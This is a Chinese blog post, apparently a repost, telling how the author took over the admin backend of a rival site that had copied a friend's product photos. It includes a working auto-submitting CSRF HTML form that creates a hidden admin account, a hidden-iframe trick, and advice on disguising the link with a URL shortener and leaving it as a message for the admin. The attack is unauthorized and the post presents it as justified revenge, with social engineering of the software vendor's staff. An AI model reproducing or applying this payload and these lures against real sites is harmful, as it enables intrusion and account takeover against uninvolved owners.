“借刀杀人”之CSRF拿下盗图狗后台
最近我一个做贸易的朋友找到我,他发现自己拍摄的图片又被某个同行盗用了,而且是全站的图片基本都被盗用。 之前对方是引用他的图片链接,后面我给他做了防盗链解决了,现在对方是先下载图片,然后自己上传到服务器。
本文作者:jasonx
我朋友说和对方谈过几次,但是对方态度嚣张,让他有本事去就去告….
那么闲来无事,咱们不如来一发?
0×01 信息收集
先随便浏览一些页面,发现网站是aspx的,然后扫描了下,windows服务器,iis搭建。
通过指纹识别没查到相关cms,然后开始看JS和css等文件,没发现什么有价值的信息。
然后我发现在他的网站底部,有个【技术支持】,点击后跳转到一家软件公司。
0×02 套路 满满的套路
进入软件公司网站后,在首页底部找到客服的QQ号,我添加上了以后开始要演示地址。
一般演示地址都会给后台地址的,我目的就是看后台有没有漏洞。
本来以为后台是admin的,试了下没进去,然后咱们继续套路客服。
得到后台以后开始找上传点尝试截断上传,最终尝试失败。
翻了下其他的功能也没啥用,不过我发现在后台的管理员添加这里,貌似存在CSRF。
那么咱们就来测试一下看看。
点击添加管理员
进入后我们输入用户名:haha 密码:123456 邮件地址随便输入一个。
然后开启浏览器代理,打开burp对数据包进行拦截,然后点添加按钮。
我们就抓到了一个添加管理员的POST请求。
通过分析发现没有token验证。
然后我们点击右键,选择Engagement tools > Generate CSRF poc
点击以后会进入这里,我们copy html代码到本地,新建一个html文件,把代码复制进去。
然后把这个html文件上传到自己的网站空间(本地打开测试也是可以的),通过浏览器打开这个html文件的URL,点击按钮以后,发现跳转到了后台的首页,然后重新进入管理员列表发现已经多了一个haha的管理员账号,拥有全部权限。
0×03 空降一个管理员账号
现在咱们就去套路这个盗用别人劳动成果的无耻之徒吧。
不过在这之前,我们先改进一下这个html文件,要不然一个大大的按钮容易让人起疑心,而且我们要让数据自动提交,而不是要诱骗他去点击这个按钮。
改进后的代码如下:
<html><head> <script>function sub(){document.form1.submit(); } setTimeout(sub,1); </script> </head><body><form name="form1" action="http://www.xxxx.com/admin/store/AddManager.aspx" method="POST"><input type="hidden" name="__VIEWSTATE" value="/wEPDwUKMTg4Mjk2---强行打码---wMEZ2dnZxYBZmRk" /><input type="hidden" name="ctl00$contentHolder$txtUserName" value="hack" /><input type="hidden" name="ctl00$contentHolder$txtPassword" value="123456" /><input type="hidden" name="ctl00$contentHolder$txtPasswordagain" value="123456" /><input type="hidden" name="ctl00$contentHolder$txtEmail" value="656566568@qq.com" /><input type="hidden" name="ctl00$contentHolder$dropRole" value="3c40faeb-马赛克-ad3c-5fb1afd018b6" /><input type="hidden" name="ctl00$contentHolder$btnCreate" value="æ·» åŠ " /><input type="submit" value="Submit request" style="display:none" /></form></body> </html>
这里感谢45楼的表哥提醒,用以下方法可以实现隐藏跳转。
准备两个页面 ,一个放csrf的代码 1.html,另一个页面2.html 用iframe包含住1.html
<iframe src=”1.html” style=”display:none”></iframe>然后把2.html生成url短链接,发给对方即可。
现在我们把这个改进好的html文件上传到网站空间,然后重新访问一遍测试是否可用。
测试完成以后把这个url放到http://www.alifeifei.net/缩短。
点击生成以后,得到一个缩短的地址,目的就是为了好欺骗网站管理员。
访问这个缩短的地址会自动跳转到我们的html文件。
现在登录这个抄袭者的网站前台,然后给管理员发送一个我们缩短的那个链接。
这里是个野路子,为什么我不通过QQ直接发地址过去(原因是如果对方在打开你链接的时候没有登录后台,就不会触发CSRF)
所以,我们选择在网站上给他留言,如果管理员看到这个留言,那么他肯定是在后台并且登录了的,所以只要他打开这个地址就会中招。
等了一会儿我尝试用我们构造好的hack账号登陆,还是没登陆上。
0×04 等不及了 继续套路
现在回到这个盗图者的网站,在网站上找到他的QQ,然后添加。
现在登录后台看看,账号:hack 密码:123456 成功进入
借用盗图狗的手打了他自己一耳刮子( • ̀ω•́ )✧
然后把这个账号密码发给我朋友,剩下的看他怎么弄啦….
0×05 你懂的
拉黑 删除自己网站空间的html文件。
0×06 分享一个CSRF的利用工具
回原文下载附件哈<<<<<<
免费课程学习地址:https://bbs.ichunqiu.com/thread-28971-1-1.html
>>>>>>黑客入门必备技能 带你入坑,和逗比表哥们一起聊聊黑客的事儿,他们说高精尖的技术比农药都好玩!
转载于:https://www.cnblogs.com/ichunqiu/p/8206216.html
“借刀杀人”之CSRF拿下盗图狗后台相关推荐
- 渗透测试|CSRF拿下盗图狗后台
更多渗透技能 欢迎搜索公众号:白帽子左一 看到了篇贼6的文章.原作者:jasonx 转载自:http://aakw.net/2g7ry 前言: 我朋友说和对方谈过几次,但是对方态度嚣张,让他有本事去就 ...
- 成都拓嘉辰丰电商:拼多多侵权盗图如何举报
相信大家在拼多多上面购物得时候会经常看到一模一样得图片,有的商家侵权,盗取别人的劳动成果.被盗图者一般来说是比较憎恶这种行为的,是可以举报盗图者的,那么拼多多被盗图了该怎样举报呢?下面跟着小编一起来看 ...
- 成都榆熙教育电商:拼多多关于盗图搬用的知识有哪些?
随着拼多多的日益壮大,用户数量也是越来越多,来拼多多开店的商家也是多不胜数,但有些商家的行为就很是令人恼火,那就是盗图搬运,那么遇到被盗图的情况我们应该怎么解决呢?跟着榆熙教育电商小编一起来学习一下吧 ...
- 小米盗图迪丽热巴?公关经理:占位示意 不存在故意盗图!
2018年末,小米集团与美图公司达成战略合作伙伴关系."收购"美图的小米无疑补足了其在美颜自拍方面的不足.在即将发布的小米9上,小米也着重在美颜自拍功能上加紧发力.近期宣传中不断提 ...
- 淘宝新店被人举报盗图要扣分处理办法
现在做淘宝淘宝的主图详情真的很重要,主图是门面,详情是内容,不管实体店还是网店,如果你的门面不够清颖脱俗,那势必别人看一眼就走了,不会停留片刻,抑或进店享受服务,所以淘宝宝贝主图的优化特别重要,一个好 ...
- 嗅图狗——更新与反馈专贴
以百度出来的"傻狗"作为嗅图狗的标志 1.->最新版本链接: 20200507 应一些网友的需求,打包了个32位版: 链接:https://pan.baidu.com/s/1 ...
- 盗图+php,PHP小偷程序的设计与实现方法详解
本文实例讲述了PHP小偷程序的设计与实现方法.分享给大家供大家参考,具体如下: 其实自己一直想做一个内涵图片的网站,以前的想法是做一个CMS,然后自己上传一些图片.. 开始真这么做的,没什么动力.之后 ...
- 如何在图片上加水印防止盗图?
如何在图片上加水印防止盗图?大家都知道,互联网是一个开放的平台,在互联网上可以获取任何你想要的文件或者资料,不仅简单而且成本非常低,所以有很多人会在网上盗用别人的图片,然后为自己所用,这严重侵害了图片 ...
- 几张一模一样的照片_【有图】两张照片一模一样却不是盗图?-蜂鸟网
翻译 | Virginia Woolf 很多摄影师在网上看到其他摄影师发布的取景地,都会慕名前往,而这种行为往往就会导致很多人被说自己盗图之类的,受冤枉不说,可能还会影响自己的摄影生涯.尤其在网络技 ...
最新文章
- 爬虫之xpath语法-节点修饰语法
- matlab练习程序(图像放大/缩小,最邻近插值)
- 在嵌入式Neo4j中使用Neo4j浏览器
- Flowable 数据库表结构 ACT_HI_PROCINST
- # android开发:4-1、Activity启动方式、生命周期、不同activity的数据传递
- C++之强制转换const_cast、static_cast、dynamic_cast、reinterpret_cast 、dynamic_cast
- hnu 暑期实训之公交系统
- HTTP/2特性及其在实际应用中的表现
- 安川控制器MP3300与C# 上位机通讯
- 巨杉数据库入选Gartner报告,中国数据库原创力量崛起
- c语言实验作业感想,c语言程序报告实验总结(共10篇).docx
- 工厂方法模式应用场景
- uniapp 清除文件缓存
- 一、Windows系统下安装Tensorflow2.x(2.6)
- Dojo 1.6 最新官方教程: Dojo DOM 函数
- webrtc jitter buffer
- 【安卓笔记】android申请储存权限,读写文件
- java二重循环_java二重循环
- 壹职行帮助学生做好职业规划
- C#毕业设计——基于C#+asp.net+SQL Server的公交车管理系统设计与实现(毕业论文+程序源码)——公交车管理系统
热门文章
- 【板栗糖GIS】轻量3d格式转换软件—CADExchanger的安装教程
- access 2000 转换为97
- git 切换分支报错
- 中国IDC机房评测分级的标准
- PDF转PPT文档软件PDF to PowerPoint Mac
- 共享白板程序源代码_OMCS 
Demo -- 电子白板的课件功能展现(附源码) - 傲瑞科技 - 官方博客...
- java 生成bdf
- 忆阻器(二)——忆阻模拟器
- 计算机毕业设计Java考生服务系统(源码+mysql数据库+系统+lw文档)
- Cat.1和Cat.4的区别